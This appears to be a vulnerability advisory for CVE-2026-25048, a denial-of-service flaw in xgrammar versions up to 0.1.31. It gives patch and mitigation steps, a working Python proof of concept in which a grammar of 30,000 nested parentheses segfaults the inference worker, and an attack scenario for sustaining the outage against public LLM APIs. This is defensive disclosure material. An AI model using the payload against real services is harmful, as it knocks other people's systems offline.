CVE-2026-25048 — HIGH AI Security Vulnerability

CISO Take

If your AI inference stack uses xgrammar for structured output generation, patch to v0.1.32 immediately — a single-line malicious grammar string crashes the inference worker process cold. Any system accepting externally-supplied grammar rules is exposed to trivial DoS; no special skills required. This is a patch-now, no-exception item for teams running constrained LLM generation pipelines.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
xgrammar	pip	<= 0.1.31	`0.1.32`

Do you use xgrammar? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

0.1%

chance of exploitation in 30 days

KEV Status

Not in KEV

Sophistication

Trivial

Recommended Action

1. PATCH: Upgrade xgrammar to v0.1.32 now — `pip install --upgrade xgrammar`. Verify: `pip show xgrammar | grep Version`. 2. AUDIT: Inventory all inference services — CI/CD pipelines, model servers, agent runtimes — for xgrammar <= 0.1.31. 3. WORKAROUND (if patching is delayed): Validate grammar inputs server-side before passing to compiler — reject inputs with nesting depth > 500 or total length > 10KB. 4. DETECT: Alert on inference process crashes or abnormal restart frequency; correlate with grammar compilation events in application logs. 5. ISOLATE: Run grammar compilation in a sandboxed subprocess with ulimit memory/stack caps to contain blast radius if a zero-day follows.

Classification

DoS Inference Framework AML.T0010.001 - AI Software AML.T0029 - Denial of AI Service AML.T0034 - Cost Harvesting AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

EU AI Act

Art.9 - Risk management system Article 9 - Risk Management System — technical robustness and safety

ISO 42001

8.4 - AI system operation and monitoring A.6.2.6 - Availability of AI system

NIST AI RMF

GOVERN-4.1 - Organizational risk policies cover AI risks MANAGE-2.2 - Mechanisms to maintain AI system reliability and resilience MANAGE-2.4 - Residual risks are managed

OWASP LLM Top 10

LLM04 - Model Denial of Service LLM10:2025 - Unbounded Consumption

Technical Details

NVD Description

### Summary The multi-level nested syntax caused a segmentation fault (core dump). ### Details A trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses. ### PoC ``` #!/usr/bin/env python3 """ XGrammar - Math Expression Generation Example """ import xgrammar as xgr import torch from transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig s = '(' * 30000 + 'a' grammar = f"root ::= {s}" def main(): device = "cuda" if torch.cuda.is_available() else "cpu" model_name = "Qwen/Qwen2.5-0.5B-Instruct" # Load model model = AutoModelForCausalLM.from_pretrained( model_name, torch_dtype=torch.float16 if device == "cuda" else torch.float32, device_map=device ) tokenizer = AutoTokenizer.from_pretrained(model_name) config = AutoConfig.from_pretrained(model_name) # Math expression grammar math_grammar = grammar # Setup tokenizer_info = xgr.TokenizerInfo.from_huggingface( tokenizer, vocab_size=config.vocab_size ) compiler = xgr.GrammarCompiler(tokenizer_info) compiled_grammar = compiler.compile_grammar(math_grammar) # Generate prompt = "Math: " inputs = tokenizer(prompt, return_tensors="pt").to(device) xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar) output_ids = model.generate( **inputs, max_new_tokens=50, logits_processor=[xgr_processor] ) result = tokenizer.decode( output_ids[0][len(inputs.input_ids[0]):], skip_special_tokens=True ) print(f"Generated expression: {result}") if __name__ == "__main__": main() ``` ``` > pip show xgrammar Name: xgrammar Version: 0.1.31 Summary: Efficient, Flexible and Portable Structured Generation Home-page: Author: MLC Team Author-email: License: Apache 2.0 Location: /home/yuelinwang/.local/lib/python3.10/site-packages Requires: numpy, pydantic, torch, transformers, triton, typing-extensions Required-by: > python3 1.py `torch_dtype` is deprecated! Use `dtype` instead! Segmentation fault (core dumped) ``` ### Impact DoS

Exploitation Scenario

Adversary discovers a public-facing LLM API endpoint (e.g., an AI coding assistant or data extraction service) that accepts a user-defined output schema powered by xgrammar for structured JSON generation. They craft a grammar string — `'(' * 30000 + 'a'` — trivially generated in one Python line. Submitting this as the output grammar schema triggers a stack overflow during xgrammar compilation, segfaulting the inference worker. On non-containerized deployments, the service is down until manual intervention. On Kubernetes, the pod restart loop is detectable but creates sustained degraded availability. With no input validation, the adversary sustains the DoS by replaying the request at low frequency, evading rate-limiting thresholds.

Weaknesses (CWE)

CWE-674 Uncontrolled Recursion Primary

References

Timeline

Published

March 5, 2026

Last Modified

March 5, 2026

First Seen

March 24, 2026